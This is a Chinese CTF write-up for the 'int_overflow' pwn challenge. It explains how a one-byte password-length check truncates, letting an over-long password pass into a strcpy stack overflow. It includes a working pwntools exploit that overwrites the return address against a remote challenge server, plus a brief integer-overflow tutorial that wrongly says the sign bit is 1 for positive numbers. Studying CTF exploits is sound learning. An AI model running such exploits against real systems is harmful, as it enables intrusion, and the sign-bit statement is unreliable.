int_overflow题解

首先，进行程序基本信息检查：

没有canary，没有PIE。程序执行是先选择一个子流程，然后输入username，再输入passwd。这里要考虑程序是否会对输入的字符串的长度进行限制，先留心一下。

IDA查看一下源码：

• 首先看一下strings：

  

  有收获，存在几个危险函数，而且存在"cat flag"，可以考虑直接调用。

• 进main函数看一下：

  

  没有发现什么大问题，直接进login。

  

  需要留心一下，username和passwd都做了最大长度限制。但是passwd的长度未免太长了吧。。。太可疑。

• 进入check_passwd查看对passwd的处理：

  

  到这里就很明显了，函数首先设定了v3变量，但是大小只有一个字节，共8bit。前面对passwd进行长度限制时，最大长度为0x199，这很明显一个字节存储不下。那么会发生什么呢？整数溢出。（后续会给出整数溢出的相关知识介绍）

  输入的passwd的长度给到v3，进行判断，因为存在整数溢出，所以这里输入的字符的个数不管是3～8还是259～264都是可以通过验证的。再往下，使用strcpy将passwd拷贝进stack中，stack中给出的保存passwd的大小为0x14 :

  

如果输入的passwd的字符个数超过了0x14，那么就会覆盖到stack中的内容。

• 覆盖数据计算：

  思路已经确定，利用整数溢出漏洞来输入大量的passwd字符造成栈溢出。具体长度只要在259～264之间即可。此处选择262。看一下汇编确认具体的填充数据结构：

  

  

  从汇编代码中可以看到，想要覆盖到返回地址，先使用0x14 个数据覆盖stack拷贝的passed的内存区域，然后使用4字节数据覆盖ebp，再使用"cat flag"的地址覆盖返回地址，最后接上262剩余的数据即可。

  

  所以payload的构成为：

    payload = "A"*0x14 +"AAAA"+ P32(cat_flag_addr) + "A"*234(262-0x14-4-4)
  

EXP:

from pwn import *

sh=remote('111.198.29.45',44241)

sh.sendlineafter("choice:","1")
sh.sendlineafter("username:\n","xctf")

cat_flag_addr = 0x08048694
payload = "A" * 0x14 + "AAAA" + p32(cat_flag_addr) + "A" * 234

sh.sendlineafter("passwd:\n",payload)
print sh.recvall()

执行结果

整数溢出的相关知识

整数分为有符号和无符号两种类型，有符号数以最高位作为其符号位，即正整数 最高位为1，负数为0，无符号数取值范围为非负数，常见各类型占用字节数如下:

对于unsigned short int类型的数据，var1 = 1,var2 = 65537，用计算器看一下：

65537会发生高位截断，截断之后最高位的1被舍弃，这样数据就变成了1。使用代码验证一下：

#include <stdio.h>
int main(){
    unsigned short int a = 1;
    unsigned short int b = 65537;
    if(a == b){
        printf("Int overflow sucssesfully!\n");
    }
    return 0;
}

编译运行之后如下：

也就是说，对于一个2字节的unsigned short int 型变量，它的有效数据长度为2个字节，当它的数据长度超过2个字节时，就发生溢出，溢出的部分则直接忽略。使用相关变量时，使用的数据仅为最后2个字节，因此就会出现65537等于1的情况，其他类型变量和数值与之类似，更为详细的说明可以参考ctf-all-in-one。

[培训]《安卓高级研修班(网课)》月薪三万计划，掌 握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法